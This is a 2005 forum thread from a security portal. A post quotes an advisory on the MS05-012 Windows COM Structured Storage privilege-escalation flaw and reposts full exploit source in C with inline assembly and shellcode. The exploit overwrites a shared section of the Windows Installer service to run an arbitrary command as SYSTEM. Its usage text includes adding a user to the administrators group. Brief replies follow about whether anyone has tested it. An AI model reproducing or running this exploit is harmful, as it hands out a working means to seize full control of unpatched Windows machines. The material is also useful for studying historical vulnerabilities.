Waraxe IT Security Portal
Login or Register
November 16, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 73
Members: 0
Total: 73
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> M$ Windows -> M$ Windows COM Structured Storage Local Privilege Escalation
Post new topicReply to topic View previous topic :: View next topic
M$ Windows COM Structured Storage Local Privilege Escalation
PostPosted: Tue May 31, 2005 3:12 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Look, what i found from bugtraq:

http://www.securityfocus.com/bid/12483/discussion/

Quote:

Microsoft Windows is reported prone to a local privilege escalation vulnerability when processing COM structured storage files. This issue may allow a local attacker to gain elevated privileges on a vulnerable computer.
An attacker with local interactive access may craft an application that triggers this condition and gain SYSTEM privileges on a vulnerable computer.


http://www.securityfocus.com/data/vulnerabilities/exploits/SSExploit.c

Code:

// by Cesar Cerrudo - Argeniss - www.argeniss.com
// MS05-012 - COM Structured Storage Vulnerability - CAN-2005-0047 Exploit
//
// More exploits at www.argeniss.com/products.html
//
// Works on Win2k sp4, WinXP sp2, Win2k3 sp0
// Close all runing programs to avoid possible problems
// If it finds the section and it doesn't work remove section permissions
// from msiexec service process with WinObj or crash the msiexec service and try again
// if offsets don't work, debug and change them

#include <windows.h>
#include <stdio.h>

typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJDIR_INFORMATION {
UNICODE_STRING ObjectName;
UNICODE_STRING ObjectTypeName;
BYTE Data[1];
} OBJDIR_INFORMATION;

typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
UNICODE_STRING *ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

#define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}

typedef DWORD (WINAPI* MSIINSTALLPRODUCT)(LPCSTR szPackagePath, LPCSTR szCommandLine);
MSIINSTALLPRODUCT MsiInstallProduct;

typedef DWORD (WINAPI* NTQUERYDIRECTORYOBJECT)( HANDLE, OBJDIR_INFORMATION*, DWORD, DWORD ,DWORD,DWORD*,DWORD* );
NTQUERYDIRECTORYOBJECT NtQueryDirectoryObject;

typedef DWORD (WINAPI* NTOPENDIRECTORYOBJECT)( HANDLE *, DWORD,OBJECT_ATTRIBUTES* );
NTOPENDIRECTORYOBJECT NtOpenDirectoryObject;


DWORD WINAPI LoadWinInstaller(LPVOID lpParam)
{
HMODULE hMsi;

hMsi = LoadLibrary("msi.dll");
MsiInstallProduct = (MSIINSTALLPRODUCT)GetProcAddress(hMsi, "MsiInstallProductA");
//run unistall , without permissions this makes a windows pop up
//while this window is showing the shared section is created and available on Windows Installer service process
MsiInstallProduct((char*)lpParam,"REMOVE=ALL");

return 0;
}



int main(int argc, char* argv[])
{

OBJDIR_INFORMATION *ssinfo =(OBJDIR_INFORMATION* ) HeapAlloc(GetProcessHeap(), 0, 0x800);

HANDLE hFile,hThread,hMapFile;
HMODULE hNtdll ,hKernel;
DWORD dwThreadId;
OBJECT_ATTRIBUTES obj;
WCHAR * uString=L"\\BaseNamedObjects";
UNICODE_STRING str;
DWORD i,a,iStrLen,b=0;
char sObjName[30],sTmp[50];
LPVOID lpMapAddress;
FARPROC pWinExec,pExitThread;
bool bFound;
char* sCommand;


if (!argv[1]||!argv[2]) {
printf("\nUsage :\n SSExploit \"Applicatoin to uninstall\" \"command\" \n");
printf("\nExamples :\n SSExploit \"c:\\windows\\system32\\webfldrs.msi\" \"cmd.exe\" (cmd.exe will interactively run on Win2k only) \n SSExploit \"c:\\windows\\system32\\webfldrs.msi\" \"net localgroup administrators /add youruser\" \n");
exit(0);
}

iStrLen=strlen(argv[2]);

if(iStrLen>=65){
printf("\n\"command\" must be less than 65 chars.\n");
exit(0);
}

sCommand=argv[2];

hThread = CreateThread(NULL,0,LoadWinInstaller,argv[1],0,&dwThreadId);

Sleep(3000);

hNtdll = LoadLibrary("ntdll.dll");

NtQueryDirectoryObject = (NTQUERYDIRECTORYOBJECT )GetProcAddress(hNtdll,"NtQueryDirectoryObject");
NtOpenDirectoryObject = (NTOPENDIRECTORYOBJECT )GetProcAddress(hNtdll,"NtOpenDirectoryObject");

str.Length=wcslen(uString)*2;
str.MaximumLength =wcslen(uString)*2+2;
str.Buffer =uString;

InitializeObjectAttributes (&obj, &str, 0, 0, 00);
NtOpenDirectoryObject(&hFile,0x20001,&obj);

printf("\nSearching for Shared Section...\n\n");

// Get all objects names under \BaseNamedObjects

if (NtQueryDirectoryObject(hFile,ssinfo,0x800,TRUE,TRUE,&b,&a)==0){
do{
bFound=NULL;
while (NtQueryDirectoryObject(hFile,ssinfo,0x800,TRUE,FALSE,&b,&a)==0){
//check if it's a section name
if (!wcscmp(ssinfo->ObjectTypeName.Buffer ,L"Section")){
for (i=0;(i<=wcslen(ssinfo->ObjectName.Buffer))&(i<30);i++){
sObjName[i]=(char)ssinfo->ObjectName.Buffer[i];
}
//check if it's the one we are searching for
if (!strncmp(sObjName,"DfSharedHeap",12)){
bFound=1;
break;
}
}
}
if (bFound)
printf("Shared Section Found: %s\n",sObjName);
else {
printf("Shared Section Not Found");
exit(0);
}

strcpy(sTmp,"Global\\");
strcat(sTmp,sObjName); //append global prefix to support Terminal Services

hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,sTmp);

//the shared section name couldn't be the one we are searching for
if (hMapFile == NULL)
printf("Could not open Shared Section\n\n");
else
printf("Shared Section opened\n\n");

} while (hMapFile == NULL) ;

lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0);

if (lpMapAddress == NULL) {
printf("Could not map Shared Section");
exit(0);
}
else
printf("Shared Section Mapped\n\nOverwriting Pointer and Inyecting Shellcode...\n\n");

hKernel=LoadLibrary("Kernel32.dll");

pWinExec=GetProcAddress(hKernel,"WinExec");
pExitThread=GetProcAddress(hKernel,"ExitThread");

_asm{

mov eax,fs:[30h] // get pointer to PEB
mov eax,[eax+0A8h] // get OS minor version
cmp eax,0x0
jz W2ksp4
cmp eax,0x1
jz WinXPsp2
jmp Win2K3 // address of section seems static on same OS version

W2Ksp4:
mov eax,0x0101FFF0 // address of begining of section - 0x10 used to overwrite pointer
mov edx,0x01020004 // address of shellcode
jmp Done

WinXPsp2:
mov eax,0x0086FFF0 // address of begining of section - 0x10 used to overwrite pointer
mov edx,0x00870004 // address of shellcode
jmp Done

Win2K3:
mov eax,0x007BFFF0 // address of begining of section - 0x10 used to overwrite pointer
mov edx,0x007C0004 // address of shellcode

Done:
mov ebx,lpMapAddress
mov ecx, 0x1000

l00p: // overwrite section data, so overwriten structures will point to shellcode
mov dword ptr[ebx],eax
sub ecx,0x4
add ebx,0x4
cmp ecx,0x0
jnz l00p

mov ebx,lpMapAddress //address of shellcode
mov dword ptr[ebx],edx

//start copying shellcode

lea esi, Shellcode
lea edi, [ebx+4]
lea ecx, End
sub ecx, esi
push esi
push edi
cld
rep movsb

pop edi
pop esi
push edi
lea ecx, CommandBuf
sub ecx, esi
add edi, ecx
mov esi, sCommand
mov ecx, iStrLen
rep movsb
mov [edi], 0x00

pop edi
mov esi, pWinExec
mov [edi+0x5], esi

mov esi, pExitThread
mov [edi+0x9], esi

}

printf("Command should have been executed ;)\n");
CloseHandle(hMapFile);

}
else printf("Couldn't get object names \n");

return 0;

_asm{

Shellcode:
call getDelta
// this gets overwrited
mov ax,0xffff
mov ax,0xffff

CommandBuf: // this gets overwrited
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555

getDelta:
pop edx // Get shellcode/shared section pointer
push edx // save edx

push 0x1 // push 0x0 for hidden window
lea eax, [edx+0x8]
push eax // Command offset
call [edx] // Call WinExec

pop edx
call [edx+0x4] // Call ExitThread to avoid msiexec service to crash

End:
}
}



Seems like nice way to r00t the M$ b0x Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jun 01, 2005 5:23 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




waraxe you test this exploit ?
View user's profile Send private message Visit poster's website
PostPosted: Thu Jun 02, 2005 1:25 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




LINUX wrote:
waraxe you test this exploit ?


No, i have not yet tested this sploit.
View user's profile Send private message Send e-mail Visit poster's website
M$ Windows COM Structured Storage Local Privilege Escalation
www.waraxe.us Forum Index -> M$ Windows
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.059 Seconds